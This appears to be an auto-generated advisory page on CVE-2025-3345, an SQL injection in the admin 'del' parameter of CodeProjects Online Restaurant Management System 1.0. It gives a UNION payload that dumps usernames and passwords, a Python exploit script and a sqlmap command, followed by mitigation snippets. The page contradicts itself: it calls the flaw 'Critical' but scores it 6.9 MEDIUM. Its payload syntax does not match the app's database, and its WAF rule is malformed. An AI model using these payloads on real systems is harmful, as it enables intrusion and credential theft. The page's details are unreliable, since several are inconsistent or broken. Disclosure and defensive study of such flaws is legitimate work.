How CVE-2025-3345 Works
The vulnerability exists in the `/admin/combo.php` file of CodeProjects Online Restaurant Management System 1.0. The `del` parameter is improperly sanitized, allowing attackers to inject malicious SQL queries. When a crafted payload is sent via HTTP request, the backend database executes unintended commands, potentially leading to unauthorized data access, modification, or deletion. The attack is remotely exploitable without authentication, making it critical. Exploits leveraging this flaw have been publicly disclosed, increasing the risk of widespread abuse.
DailyCVE Form
Platform: CodeProjects ORMS
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/30/2025
What Undercode Say:
Exploitation
1. Payload Example:
GET /admin/combo.php?del=1' UNION SELECT username,password FROM users-- HTTP/1.1
2. Automated Exploit (Python):
import requests
target = "http://target.com/admin/combo.php"
payload = "1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--"
response = requests.get(target, params={"del": payload})
print(response.text)
3. SQLMap Command:
sqlmap -u "http://target.com/admin/combo.php?del=1" --risk=3 --level=5
Protection
1. Input Sanitization:
$del = mysqli_real_escape_string($conn, $_GET['del']);
2. Prepared Statements:
$stmt = $conn->prepare("DELETE FROM combos WHERE id = ?");
$stmt->bind_param("i", $_GET['del']);
3. WAF Rules:
location /admin/ {
modsecurity_rules 'SecRule ARGS_GET "del" "id:1000,deny,status:403,msg:'SQLi Attempt'"';
}
4. Patch Verification:
grep -r "mysqli_real_escape_string" /var/www/html/admin/
Analytics
- CVSS 4.0: 6.9 (MEDIUM)
- Attack Vector: Network
- Privileges Required: None
- Exploitability: High (Public PoC)
- Mitigation Difficulty: Low (Code Fix)
References
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
